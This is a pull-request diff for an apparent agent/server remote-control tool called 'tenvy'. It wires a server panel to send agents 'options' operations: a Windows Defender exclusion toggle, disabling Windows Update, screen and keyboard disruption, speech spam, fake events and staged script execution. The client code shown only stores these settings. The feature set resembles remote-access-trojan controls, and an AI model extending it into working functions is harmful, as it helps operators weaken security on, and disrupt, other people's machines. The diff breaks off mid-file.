### PR TITLE
Implement client-side options tool operations

### DIFF
--- a/tenvy-client/internal/agent/agent.go
+++ b/tenvy-client/internal/agent/agent.go
@@ -8,6 +8,7 @@ import (
 	"time"
 
 	notes "github.com/rootbay/tenvy-client/internal/modules/notes"
+	options "github.com/rootbay/tenvy-client/internal/operations/options"
 	"github.com/rootbay/tenvy-client/internal/plugins"
 	"github.com/rootbay/tenvy-client/internal/protocol"
 	manifest "github.com/rootbay/tenvy-client/shared/pluginmanifest"
@@ -42,6 +43,7 @@ type Agent struct {
 	plugins                      *plugins.Manager
 	requestHeaders               []CustomHeader
 	requestCookies               []CustomCookie
+	options                      *options.Manager
 }
 
 func (a *Agent) AgentID() string {

--- a/tenvy-client/internal/agent/commands.go
+++ b/tenvy-client/internal/agent/commands.go
@@ -205,6 +205,21 @@ func toolActivationCommandHandler(_ context.Context, agent *Agent, cmd protocol.
 		)
 	}
 
+	if agent != nil && strings.EqualFold(toolID, "options") && strings.HasPrefix(action, "operation:") {
+		operation := strings.TrimSpace(action[len("operation:"):])
+		if operation == "" {
+			return newFailureResult(cmd.ID, "missing options operation")
+		}
+		if agent.options == nil {
+			return newFailureResult(cmd.ID, "options manager unavailable")
+		}
+		summary, err := agent.options.ApplyOperation(operation, payload.Metadata)
+		if err != nil {
+			return newFailureResult(cmd.ID, err.Error())
+		}
+		return newSuccessResult(cmd.ID, summary)
+	}
+
 	summary := fmt.Sprintf("%s %s", action, toolID)
 	if actor := strings.TrimSpace(payload.InitiatedBy); actor != "" {
 		summary = fmt.Sprintf("%s by %s", summary, actor)

--- a/tenvy-client/internal/agent/runtime.go
+++ b/tenvy-client/internal/agent/runtime.go
@@ -13,6 +13,7 @@ import (
 	"time"
 
 	notes "github.com/rootbay/tenvy-client/internal/modules/notes"
+	options "github.com/rootbay/tenvy-client/internal/operations/options"
 	"github.com/rootbay/tenvy-client/internal/plugins"
 	"github.com/rootbay/tenvy-client/internal/protocol"
 	manifest "github.com/rootbay/tenvy-client/shared/pluginmanifest"
@@ -139,6 +140,7 @@ func runAgentOnce(ctx context.Context, opts RuntimeOptions) error {
 		timing:          opts.TimingOverride,
 		requestHeaders:  opts.CustomHeaders,
 		requestCookies:  opts.CustomCookies,
+		options:         options.NewManager(),
 	}
 
 	agent.reloadResultCache()

--- a/tenvy-client/internal/operations/options/manager.go
+++ b/tenvy-client/internal/operations/options/manager.go
@@ -1,0 +1,497 @@
+package options
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+	"sync"
+)
+
+type ScriptFile struct {
+	Name string
+	Size int64
+	Type string
+}
+
+type ScriptConfig struct {
+	File         *ScriptFile
+	Mode         string
+	Loop         bool
+	DelaySeconds int
+}
+
+type State struct {
+	DefenderExclusion bool
+	WindowsUpdate     bool
+	VisualDistortion  string
+	ScreenOrientation string
+	WallpaperMode     string
+	CursorBehavior    string
+	KeyboardMode      string
+	SoundPlayback     bool
+	SoundVolume       int
+	Script            ScriptConfig
+	FakeEventMode     string
+	SpeechSpam        bool
+	AutoMinimize      bool
+}
+
+type Manager struct {
+	mu    sync.RWMutex
+	state State
+}
+
+func NewManager() *Manager {
+	return &Manager{
+		state: State{
+			VisualDistortion:  "None",
+			ScreenOrientation: "Normal",
+			WallpaperMode:     "Default",
+			CursorBehavior:    "Normal",
+			KeyboardMode:      "None",
+			SoundPlayback:     true,
+			SoundVolume:       60,
+			Script: ScriptConfig{
+				Mode: "Instant",
+			},
+			FakeEventMode: "None",
+		},
+	}
+}
+
+func (m *Manager) Snapshot() State {
+	if m == nil {
+		return State{}
+	}
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	return m.state
+}
+
+func (m *Manager) ApplyOperation(rawOperation string, metadata map[string]any) (string, error) {
+	if m == nil {
+		return "", fmt.Errorf("options manager not initialized")
+	}
+
+	operation := strings.TrimSpace(strings.ToLower(rawOperation))
+	if operation == "" {
+		return "", fmt.Errorf("missing operation")
+	}
+
+	switch operation {
+	case "defender-exclusion":
+		enabled, err := expectBool(metadata, "enabled")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.DefenderExclusion = enabled
+		m.mu.Unlock()
+		if enabled {
+			return "Windows Defender exclusion enabled", nil
+		}
+		return "Windows Defender exclusion disabled", nil
+
+	case "windows-update":
+		enabled, err := expectBool(metadata, "enabled")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.WindowsUpdate = enabled
+		m.mu.Unlock()
+		if enabled {
+			return "Windows Update enabled", nil
+		}
+		return "Windows Update disabled", nil
+
+	case "visual-distortion":
+		mode, err := expectString(metadata, "mode")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.VisualDistortion = mode
+		m.mu.Unlock()
+		return fmt.Sprintf("Visual distortion set to %s", mode), nil
+
+	case "screen-orientation":
+		orientation, err := expectString(metadata, "orientation")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.ScreenOrientation = orientation
+		m.mu.Unlock()
+		return fmt.Sprintf("Screen orientation set to %s", orientation), nil
+
+	case "wallpaper-mode":
+		mode, err := expectString(metadata, "mode")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.WallpaperMode = mode
+		m.mu.Unlock()
+		return fmt.Sprintf("Wallpaper mode set to %s", mode), nil
+
+	case "cursor-behavior":
+		behavior, err := expectString(metadata, "behavior")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.CursorBehavior = behavior
+		m.mu.Unlock()
+		return fmt.Sprintf("Cursor behavior set to %s", behavior), nil
+
+	case "keyboard-mode":
+		mode, err := expectString(metadata, "mode")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.KeyboardMode = mode
+		m.mu.Unlock()
+		return fmt.Sprintf("Keyboard mode set to %s", mode), nil
+
+	case "sound-playback":
+		enabled, err := expectBool(metadata, "enabled")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.SoundPlayback = enabled
+		m.mu.Unlock()
+		if enabled {
+			return "Sound playback enabled", nil
+		}
+		return "Sound playback muted", nil
+
+	case "sound-volume":
+		volume, err := expectInt(metadata, "volume")
+		if err != nil {
+			return "", err
+		}
+		if volume < 0 {
+			volume = 0
+		}
+		if volume > 100 {
+			volume = 100
+		}
+		m.mu.Lock()
+		m.state.SoundVolume = volume
+		m.mu.Unlock()
+		return fmt.Sprintf("Sound volume set to %d%%", volume), nil
+
+	case "script-file":
+		fileName, err := expectString(metadata, "fileName")
+		if err != nil {
+			return "", err
+		}
+		size, err := expectInt64(metadata, "size")
+		if err != nil {
+			return "", err
+		}
+		fileType, _, fileTypeErr := optionalString(metadata, "type")
+		if fileTypeErr != nil {
+			return "", fileTypeErr
+		}
+		m.mu.Lock()
+		m.state.Script.File = &ScriptFile{Name: fileName, Size: size, Type: fileType}
+		m.mu.Unlock()
+		return fmt.Sprintf("Script %s staged", fileName), nil
+
+	case "script-mode":
+		mode, err := expectString(metadata, "mode")
+		if err != nil {
+			return "", err
+		}
+		loop, hasLoop, loopErr := optionalBool(metadata, "loop")
+		if loopErr != nil {
+			return "", loopErr
+		}
+		delay, hasDelay, delayErr := optionalInt(metadata, "delaySeconds")
+		if delayErr != nil {
+			return "", delayErr
+		}
+
+		m.mu.Lock()
+		m.state.Script.Mode = mode
+		if hasLoop {
+			m.state.Script.Loop = loop
+		}
+		if hasDelay {
+			if delay < 0 {
+				delay = 0
+			}
+			m.state.Script.DelaySeconds = delay
+		}
+		m.mu.Unlock()
+		return fmt.Sprintf("Script execution mode set to %s", mode), nil
+
+	case "script-loop":
+		loop, err := expectBool(metadata, "loop")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.Script.Loop = loop
+		m.mu.Unlock()
+		if loop {
+			return "Script loop enabled", nil
+		}
+		return "Script loop disabled", nil
+
+	case "script-delay":
+		delay, err := expectInt(metadata, "delaySeconds")
+		if err != nil {
+			return "", err
+		}
+		if delay < 0 {
+			delay = 0
+		}
+		m.mu.Lock()
+		m.state.Script.DelaySeconds = delay
+		m.mu.Unlock()
+		return fmt.Sprintf("Script delay set to %d seconds", delay), nil
+
+	case "fake-event-mode":
+		mode, err := expectString(metadata, "mode")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.FakeEventMode = mode
+		m.mu.Unlock()
+		return fmt.Sprintf("Fake event mode set to %s", mode), nil
+
+	case "speech-spam":
+		enabled, err := expectBool(metadata, "enabled")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.SpeechSpam = enabled
+		m.mu.Unlock()
+		if enabled {
+			return "Speech spam enabled", nil
+		}
+		return "Speech spam disabled", nil
+
+	case "auto-minimize":
+		enabled, err := expectBool(metadata, "enabled")
+		if err != nil {
+			return "", err
+		}
+		m.mu.Lock()
+		m.state.AutoMinimize = enabled
+		m.mu.Unlock()
+		if enabled {
+			return "Auto minimize enabled", nil
+		}
+		return "Auto minimize disabled", nil
+	}
+
+	return "", fmt.Errorf("unsupported options operation: %s", rawOperation)
+}
+
+func expectBool(metadata map[string]any, key string) (bool, error) {
+	value, ok := metadata[key]
+	if !ok {
+		return false, fmt.Errorf("metadata missing %s", key)
+	}
+	return coerceBool(value)
+}
+
+func optionalBool(metadata map[string]any, key string) (bool, bool, error) {
+	if metadata == nil {
+		return false, false, nil
+	}
+	value, ok := metadata[key]
+	if !ok {
+		return false, false, nil
+	}
+	coerced, err := coerceBool(value)
+	if err != nil {
+		return false, false, err
+	}
+	return coerced, true, nil
+}
+
+func coerceBool(value any) (bool, error) {
+	switch v := value.(type) {
+	case bool:
+		return v, nil
+	case string:
+		trimmed := strings.TrimSpace(strings.ToLower(v))
+		switch trimmed {
+		case "1", "true", "yes", "on":
+			return true, nil
+		case "0", "false", "no", "off":
+			return false, nil
+		}
+		return false, fmt.Errorf("cannot interpret %q as boolean", v)
+	case float64:
+		if v == 0 {
+			return false, nil
+		}
+		if v == 1 {
+			return true, nil
+		}
+		return false, fmt.Errorf("cannot interpret %v as boolean", v)
+	default:
+		return false, fmt.Errorf("metadata %T cannot be interpreted as boolean", value)
+	}
+}
+
+func expectString(metadata map[string]any, key string) (string, error) {
+	value, ok := metadata[key]
+	if !ok {
+		return "", fmt.Errorf("metadata missing %s", key)
+	}
+	str, err := coerceString(value)
+	if err != nil {
+		return "", err
+	}
+	if strings.TrimSpace(str) == "" {
+		return "", fmt.Errorf("metadata %s cannot be empty", key)
+	}
+	return str, nil
+}
+
+func optionalString(metadata map[string]any, key string) (string, bool, error) {
+	if metadata == nil {
+		return "", false, nil
+	}
+	value, ok := metadata[key]
+	if !ok {
+		return "", false, nil
+	}
+	coerced, err := coerceString(value)
+	if err != nil {
+		return "", false, err
+	}
+	return coerced, true, nil
+}
+
+func coerceString(value any) (string, error) {
+	switch v := value.(type) {
+	case string:
+		return v, nil
+	case fmt.Stringer:
+		return v.String(), nil
+	case float64:
+		return fmt.Sprintf("%g", v), nil
+	case int:
+		return fmt.Sprintf("%d", v), nil
+	case int64:
+		return fmt.Sprintf("%d", v), nil
+	case uint64:
+		return fmt.Sprintf("%d", v), nil
+	case bool:
+		if v {
+			return "true", nil
+		}
+		return "false", nil
+	default:
+		return "", fmt.Errorf("metadata %T cannot be interpreted as string", value)
+	}
+}
+
+func expectInt(metadata map[string]any, key string) (int, error) {
+	value, ok := metadata[key]
+	if !ok {
+		return 0, fmt.Errorf("metadata missing %s", key)
+	}
+	return coerceInt(value)
+}
+
+func optionalInt(metadata map[string]any, key string) (int, bool, error) {
+	if metadata == nil {
+		return 0, false, nil
+	}
+	value, ok := metadata[key]
+	if !ok {
+		return 0, false, nil
+	}
+	coerced, err := coerceInt(value)
+	if err != nil {
+		return 0, false, err
+	}
+	return coerced, true, nil
+}
+
+func coerceInt(value any) (int, error) {
+	switch v := value.(type) {
+	case int:
+		return v, nil
+	case int32:
+		return int(v), nil
+	case int64:
+		return int(v), nil
+	case uint:
+		return int(v), nil
+	case uint32:
+		return int(v), nil
+	case uint64:
+		return int(v), nil
+	case float64:
+		return int(v), nil
+	case float32:
+		return int(v), nil
+	case string:
+		trimmed := strings.TrimSpace(v)
+		if trimmed == "" {
+			return 0, fmt.Errorf("cannot interpret empty string as int")
+		}
+		parsed, err := strconv.ParseInt(trimmed, 10, 64)
+		if err != nil {
+			return 0, fmt.Errorf("cannot interpret %q as int", v)
+		}
+		return int(parsed), nil
+	default:
+		return 0, fmt.Errorf("metadata %T cannot be interpreted as int", value)
+	}
+}
+
+func expectInt64(metadata map[string]any, key string) (int64, error) {
+	value, ok := metadata[key]
+	if !ok {
+		return 0, fmt.Errorf("metadata missing %s", key)
+	}
+	return coerceInt64(value)
+}
+
+func coerceInt64(value any) (int64, error) {
+	switch v := value.(type) {
+	case int:
+		return int64(v), nil
+	case int32:
+		return int64(v), nil
+	case int64:
+		return v, nil
+	case uint:
+		return int64(v), nil
+	case uint32:
+		return int64(v), nil
+	case uint64:
+		return int64(v), nil
+	case float64:
+		return int64(v), nil
+	case float32:
+		return int64(v), nil
+	case string:
+		trimmed := strings.TrimSpace(v)
+		if trimmed == "" {
+			return 0, fmt.Errorf("cannot interpret empty string as int")
+		}
+		parsed, err := strconv.ParseInt(trimmed, 10, 64)
+		if err != nil {
+			return 0, fmt.Errorf("cannot interpret %q as int", v)
+		}
+		return parsed, nil
+	default:
+		return 0, fmt.Errorf("metadata %T cannot be interpreted as int", value)
+	}
+}

--- a/tenvy-server/src/lib/components/workspace/tools/options-workspace.svelte
+++ b/tenvy-server/src/lib/components/workspace/tools/options-workspace.svelte
@@ -1,23 +1,28 @@
 <script lang="ts">
-	import { Tabs, TabsList, TabsTrigger, TabsContent } from '$lib/components/ui/tabs/index.js';
-	import { Switch } from '$lib/components/ui/switch/index.js';
-	import { Label } from '$lib/components/ui/label/index.js';
-	import {
-		Select,
-		SelectTrigger,
-		SelectContent,
-		SelectItem
-	} from '$lib/components/ui/select/index.js';
-	import { Slider } from '$lib/components/ui/slider/index.js';
-	import { Input } from '$lib/components/ui/input/index.js';
-	import { Tooltip, TooltipTrigger, TooltipContent } from '$lib/components/ui/tooltip/index.js';
-	import { Info } from '@lucide/svelte';
+        import { Tabs, TabsList, TabsTrigger, TabsContent } from '$lib/components/ui/tabs/index.js';
+        import { Switch } from '$lib/components/ui/switch/index.js';
+        import { Label } from '$lib/components/ui/label/index.js';
+        import {
+                Select,
+                SelectTrigger,
+                SelectContent,
+                SelectItem
+        } from '$lib/components/ui/select/index.js';
+        import { Slider } from '$lib/components/ui/slider/index.js';
+        import { Input } from '$lib/components/ui/input/index.js';
+        import { Tooltip, TooltipTrigger, TooltipContent } from '$lib/components/ui/tooltip/index.js';
+        import { Info } from '@lucide/svelte';
+        import type { Client } from '$lib/data/clients';
+        import { queueToolActivationCommand } from '$lib/utils/agent-commands.js';
+        import type { CommandQueueResponse } from '../../../../../../shared/types/messages';
+        import { toast } from 'svelte-sonner';
 
-	const { client } = $props<{ client: { name: string } }>();
-	void client;
+        const { client } = $props<{ client: Client }>();
 
-	let defenderExclusion = $state(false);
-	let windowsUpdate = $state(false);
+        const agentLabel = $derived(() => client.hostname?.trim() || client.codename || client.id);
+
+        let defenderExclusion = $state(false);
+        let windowsUpdate = $state(false);
 
 	let visualDistortion = $state('None');
 	let screenFlip = $state('Normal');
@@ -37,10 +42,335 @@
 	let ttsSpam = $state(false);
 	let autoMinimize = $state(false);
 
-	function handleScriptSelect(e: Event) {
-		const files = (e.target as HTMLInputElement).files;
-		if (files && files.length) scriptFile = files[0];
-	}
+        let lastCommittedSoundVolume = $state(60);
+        let lastCommittedScriptDelay = $state(0);
+
+        const toastPosition = 'bottom-right';
+
+        function describeDelivery(response: CommandQueueResponse | null): string {
+                if (!response) {
+                        return `Command queued for ${agentLabel}'s next check-in.`;
+                }
+
+                return response.delivery === 'session'
+                        ? `Action dispatched immediately to ${agentLabel}.`
+                        : `Command queued for ${agentLabel}'s next check-in.`;
+        }
+
+        interface OptionDispatchConfig {
+                action: string;
+                metadata?: Record<string, unknown>;
+                successTitle: string;
+                successDescription?: string;
+                failureTitle: string;
+                failureDescription?: string;
+        }
+
+        async function dispatchOptionChange(config: OptionDispatchConfig): Promise<boolean> {
+                try {
+                        const response = await queueToolActivationCommand(client.id, 'options', {
+                                action: `operation:${config.action}`,
+                                metadata: config.metadata
+                        });
+
+                        const description =
+                                config.successDescription ?? describeDelivery(response);
+
+                        toast.success(config.successTitle, {
+                                description,
+                                position: toastPosition
+                        });
+
+                        return true;
+                } catch (error) {
+                        const detail =
+                                config.failureDescription ??
+                                (error instanceof Error
+                                        ? error.message
+                                        : 'Unexpected error while communicating with the agent.');
+
+                        toast.error(config.failureTitle, {
+                                description: detail,
+                                position: toastPosition
+                        });
+
+                        return false;
+                }
+        }
+
+        async function handleDefenderExclusionChange(next: boolean) {
+                const previous = defenderExclusion;
+                defenderExclusion = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'defender-exclusion',
+                        metadata: { enabled: next },
+                        successTitle: next
+                                ? 'Windows Defender exclusion enabled'
+                                : 'Windows Defender exclusion disabled',
+                        failureTitle: 'Failed to update Windows Defender exclusion'
+                });
+
+                if (!success) {
+                        defenderExclusion = previous;
+                }
+        }
+
+        async function handleWindowsUpdateChange(next: boolean) {
+                const previous = windowsUpdate;
+                windowsUpdate = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'windows-update',
+                        metadata: { enabled: next },
+                        successTitle: next ? 'Windows Update enabled' : 'Windows Update disabled',
+                        failureTitle: 'Failed to update Windows Update state'
+                });
+
+                if (!success) {
+                        windowsUpdate = previous;
+                }
+        }
+
+        async function handleVisualDistortionChange(value: string) {
+                const previous = visualDistortion;
+                visualDistortion = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'visual-distortion',
+                        metadata: { mode: value },
+                        successTitle: `Visual distortion set to ${value}`,
+                        failureTitle: 'Failed to update visual distortion'
+                });
+
+                if (!success) {
+                        visualDistortion = previous;
+                }
+        }
+
+        async function handleScreenFlipChange(value: string) {
+                const previous = screenFlip;
+                screenFlip = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'screen-orientation',
+                        metadata: { orientation: value },
+                        successTitle: `Screen orientation set to ${value}`,
+                        failureTitle: 'Failed to update screen orientation'
+                });
+
+                if (!success) {
+                        screenFlip = previous;
+                }
+        }
+
+        async function handleWallpaperModeChange(value: string) {
+                const previous = wallpaperMode;
+                wallpaperMode = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'wallpaper-mode',
+                        metadata: { mode: value },
+                        successTitle: `Wallpaper mode set to ${value}`,
+                        failureTitle: 'Failed to update wallpaper mode'
+                });
+
+                if (!success) {
+                        wallpaperMode = previous;
+                }
+        }
+
+        async function handleCursorBehaviorChange(value: string) {
+                const previous = cursorBehavior;
+                cursorBehavior = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'cursor-behavior',
+                        metadata: { behavior: value },
+                        successTitle: `Cursor behavior set to ${value}`,
+                        failureTitle: 'Failed to update cursor behavior'
+                });
+
+                if (!success) {
+                        cursorBehavior = previous;
+                }
+        }
+
+        async function handleKeyboardShenanigansChange(value: string) {
+                const previous = keyboardShenanigans;
+                keyboardShenanigans = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'keyboard-mode',
+                        metadata: { mode: value },
+                        successTitle: `Keyboard mode set to ${value}`,
+                        failureTitle: 'Failed to update keyboard behavior'
+                });
+
+                if (!success) {
+                        keyboardShenanigans = previous;
+                }
+        }
+
+        async function handleSoundPlaybackChange(next: boolean) {
+                const previous = soundPlayback;
+                soundPlayback = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'sound-playback',
+                        metadata: { enabled: next },
+                        successTitle: next ? 'Sound playback enabled' : 'Sound playback muted',
+                        failureTitle: 'Failed to update sound playback state'
+                });
+
+                if (!success) {
+                        soundPlayback = previous;
+                }
+        }
+
+        async function handleSoundVolumeCommit(next: number) {
+                const previous = lastCommittedSoundVolume;
+                lastCommittedSoundVolume = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'sound-volume',
+                        metadata: { volume: next },
+                        successTitle: `Sound volume set to ${next}%`,
+                        failureTitle: 'Failed to update sound volume'
+                });
+
+                if (!success) {
+                        soundVolume = previous;
+                        lastCommittedSoundVolume = previous;
+                }
+        }
+
+        async function handleScriptSelect(event: Event) {
+                const input = event.currentTarget as HTMLInputElement | null;
+                const files = input?.files;
+                if (!files || files.length === 0) {
+                        scriptFile = null;
+                        return;
+                }
+
+                const file = files[0];
+                scriptFile = file;
+
+                const success = await dispatchOptionChange({
+                        action: 'script-file',
+                        metadata: {
+                                fileName: file.name,
+                                size: file.size,
+                                type: file.type
+                        },
+                        successTitle: `Script ${file.name} staged`,
+                        failureTitle: 'Failed to stage script file'
+                });
+
+                if (!success) {
+                        scriptFile = null;
+                        if (input) {
+                                input.value = '';
+                        }
+                }
+        }
+
+        async function handleScriptModeChange(value: string) {
+                const previous = scriptMode;
+                scriptMode = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'script-mode',
+                        metadata: { mode: value, loop: scriptLoop, delaySeconds: scriptDelay },
+                        successTitle: `Script execution mode set to ${value}`,
+                        failureTitle: 'Failed to update script execution mode'
+                });
+
+                if (!success) {
+                        scriptMode = previous;
+                }
+        }
+
+        async function handleScriptLoopChange(next: boolean) {
+                const previous = scriptLoop;
+                scriptLoop = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'script-loop',
+                        metadata: { loop: next },
+                        successTitle: next ? 'Script loop enabled' : 'Script loop disabled',
+                        failureTitle: 'Failed to update script loop state'
+                });
+
+                if (!success) {
+                        scriptLoop = previous;
+                }
+        }
+
+        async function handleScriptDelayCommit(next: number) {
+                const previous = lastCommittedScriptDelay;
+                lastCommittedScriptDelay = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'script-delay',
+                        metadata: { delaySeconds: next },
+                        successTitle: `Script delay set to ${next} seconds`,
+                        failureTitle: 'Failed to update script delay'
+                });
+
+                if (!success) {
+                        scriptDelay = previous;
+                        lastCommittedScriptDelay = previous;
+                }
+        }
+
+        async function handleFakeEventModeChange(value: string) {
+                const previous = fakeEventMode;
+                fakeEventMode = value;
+
+                const success = await dispatchOptionChange({
+                        action: 'fake-event-mode',
+                        metadata: { mode: value },
+                        successTitle: `Fake event mode set to ${value}`,
+                        failureTitle: 'Failed to update fake event mode'
+                });
+
+                if (!success) {
+                        fakeEventMode = previous;
+                }
+        }
+
+        async function handleTtsSpamChange(next: boolean) {
+                const previous = ttsSpam;
+                ttsSpam = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'speech-spam',
+                        metadata: { enabled: next },
+                        successTitle: next ? 'Speech spam enabled' : 'Speech spam disabled',
+                        failureTitle: 'Failed to update speech spam state'
+                });
+
+                if (!success) {
+                        ttsSpam = previous;
+                }
+        }
+
+        async function handleAutoMinimizeChange(next: boolean) {
+                const previous = autoMinimize;
+                autoMinimize = next;
+
+                const success = await dispatchOptionChange({
+                        action: 'auto-minimize',
+                        metadata: { enabled: next },
+                        successTitle: next ? 'Auto minimize enabled' : 'Auto minimize disabled',
+                        failureTitle: 'Failed to update auto minimize state'
+                });
+
+                if (!success) {
+                        autoMinimize = previous;
+                }
+        }
 </script>
 
 <div class="space-y-6 p-6">
@@ -63,9 +393,12 @@
 						<TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
 						<TooltipContent>Simulates adding/removing system exclusions.</TooltipContent>
 					</Tooltip>
-					<Switch bind:checked={defenderExclusion} />
-				</div>
-			</div>
+                                        <Switch
+                                                checked={defenderExclusion}
+                                                onCheckedChange={(value) => void handleDefenderExclusionChange(value)}
+                                        />
+                                </div>
+                        </div>
 
 			<div class="flex items-center justify-between rounded-lg border border-border/50 p-3">
 				<span>Windows Update</span>
@@ -74,19 +407,22 @@
 						<TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
 						<TooltipContent>Toggle simulated update checks.</TooltipContent>
 					</Tooltip>
-					<Switch bind:checked={windowsUpdate} />
-				</div>
-			</div>
-		</TabsContent>
+                                        <Switch
+                                                checked={windowsUpdate}
+                                                onCheckedChange={(value) => void handleWindowsUpdateChange(value)}
+                                        />
+                                </div>
+                        </div>
+                </TabsContent>
 
 		<TabsContent value="display" class="grid gap-4 pt-4 sm:grid-cols-2 lg:grid-cols-3">
 			<div>
 				<Label>Visual Distortion</Label>
-				<Select
-					type="single"
-					value={visualDistortion}
-					onValueChange={(v) => (visualDistortion = v)}
-				>
+                                <Select
+                                        type="single"
+                                        value={visualDistortion}
+                                        onValueChange={(value) => void handleVisualDistortionChange(value)}
+                                >
 					<SelectTrigger placeholder="None" />
 					<SelectContent>
 						<SelectItem value="None">None</SelectItem>
@@ -100,7 +436,11 @@
 
 			<div>
 				<Label>Screen Orientation</Label>
-				<Select type="single" value={screenFlip} onValueChange={(v) => (screenFlip = v)}>
+                                <Select
+                                        type="single"
+                                        value={screenFlip}
+                                        onValueChange={(value) => void handleScreenFlipChange(value)}
+                                >
 					<SelectTrigger placeholder="Normal" />
 					<SelectContent>
 						<SelectItem value="Normal">Normal</SelectItem>
@@ -113,7 +453,11 @@
 
 			<div>
 				<Label>Wallpaper Mode</Label>
-				<Select type="single" value={wallpaperMode} onValueChange={(v) => (wallpaperMode = v)}>
+                                <Select
+                                        type="single"
+                                        value={wallpaperMode}
+                                        onValueChange={(value) => void handleWallpaperModeChange(value)}
+                                >
 					<SelectTrigger placeholder="Default" />
 					<SelectContent>
 						<SelectItem value="Default">Default</SelectItem>
@@ -128,7 +472,11 @@
 		<TabsContent value="input" class="grid gap-4 pt-4 sm:grid-cols-2 lg:grid-cols-3">
 			<div>
 				<Label>Cursor Behavior</Label>
-				<Select type="single" value={cursorBehavior} onValueChange={(v) => (cursorBehavior = v)}>
+                                <Select
+                                        type="single"
+                                        value={cursorBehavior}
+                                        onValueChange={(value) => void handleCursorBehaviorChange(value)}
+                                >
 					<SelectTrigger placeholder="Normal" />
 					<SelectContent>
 						<SelectItem value="Normal">Normal</SelectItem>
@@ -141,11 +489,11 @@
 
 			<div>
 				<Label>Keyboard Shenanigans</Label>
-				<Select
-					type="single"
-					value={keyboardShenanigans}
-					onValueChange={(v) => (keyboardShenanigans = v)}
-				>
+                                <Select
+                                        type="single"
+                                        value={keyboardShenanigans}
+                                        onValueChange={(value) => void handleKeyboardShenanigansChange(value)}
+                                >
 					<SelectTrigger placeholder="None" />
 					<SelectContent>
 						<SelectItem value="None">None</SelectItem>
@@ -163,9 +511,12 @@
 						<TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
 						<TooltipContent>Enable or mute simulated audio playback.</TooltipContent>
 					</Tooltip>
-					<Switch bind:checked={soundPlayback} />
-				</div>
-			</div>
+                                        <Switch
+                                                checked={soundPlayback}
+                                                onCheckedChange={(value) => void handleSoundPlaybackChange(value)}
+                                        />
+                                </div>
+                        </div>
 
 			<div>
 				<Label>Sound Volume</Label>
@@ -175,25 +526,34 @@
 					max={100}
 					step={5}
 					value={[soundVolume]}
-					onValueChange={(v) => (soundVolume = v[0])}
-				/>
-				<p class="mt-1 text-xs text-muted-foreground">Volume: {soundVolume}%</p>
-			</div>
+                                        onValueChange={(values) => (soundVolume = values[0])}
+                                        onValueCommit={(values) => void handleSoundVolumeCommit(values[0])}
+                                />
+                                <p class="mt-1 text-xs text-muted-foreground">Volume: {soundVolume}%</p>
+                        </div>
 		</TabsContent>
 
 		<TabsContent value="automation" class="space-y-4 pt-4">
 			<div>
 				<Label>Script File</Label>
-				<Input type="file" accept=".ps1,.bat,.cmd,.sh,.js" onchange={handleScriptSelect} />
-				{#if scriptFile}
-					<p class="mt-1 text-xs text-muted-foreground">Selected: {scriptFile.name}</p>
-				{/if}
+                                <Input
+                                        type="file"
+                                        accept=".ps1,.bat,.cmd,.sh,.js"
+                                        onchange={(event) => void handleScriptSelect(event)}
+                                />
+                                {#if scriptFile}
+                                        <p class="mt-1 text-xs text-muted-foreground">Selected: {scriptFile.name}</p>
+                                {/if}
 			</div>
 
 			<div class="grid gap-4 sm:grid-cols-3">
 				<div>
 					<Label>Execution Mode</Label>
-					<Select type="single" value={scriptMode} onValueChange={(v) => (scriptMode = v)}>
+                                        <Select
+                                                type="single"
+                                                value={scriptMode}
+                                                onValueChange={(value) => void handleScriptModeChange(value)}
+                                        >
 						<SelectTrigger placeholder="Instant" />
 						<SelectContent>
 							<SelectItem value="Instant">Instant</SelectItem>
@@ -211,28 +571,36 @@
 						max={60}
 						step={5}
 						value={[scriptDelay]}
-						onValueChange={(v) => (scriptDelay = v[0])}
-					/>
-					<p class="mt-1 text-xs text-muted-foreground">Delay: {scriptDelay}s</p>
-				</div>
+                                                onValueChange={(values) => (scriptDelay = values[0])}
+                                                onValueCommit={(values) => void handleScriptDelayCommit(values[0])}
+                                        />
+                                        <p class="mt-1 text-xs text-muted-foreground">Delay: {scriptDelay}s</p>
+                                </div>
 
-				<div class="flex items-center justify-between rounded-lg border border-border/50 p-3">
-					<span>Loop Execution</span>
-					<div class="flex items-center gap-2">
-						<Tooltip>
-							<TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
-							<TooltipContent>Repeat script indefinitely.</TooltipContent>
-						</Tooltip>
-						<Switch bind:checked={scriptLoop} />
-					</div>
-				</div>
-			</div>
+                                <div class="flex items-center justify-between rounded-lg border border-border/50 p-3">
+                                        <span>Loop Execution</span>
+                                        <div class="flex items-center gap-2">
+                                                <Tooltip>
+                                                        <TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
+                                                        <TooltipContent>Repeat script indefinitely.</TooltipContent>
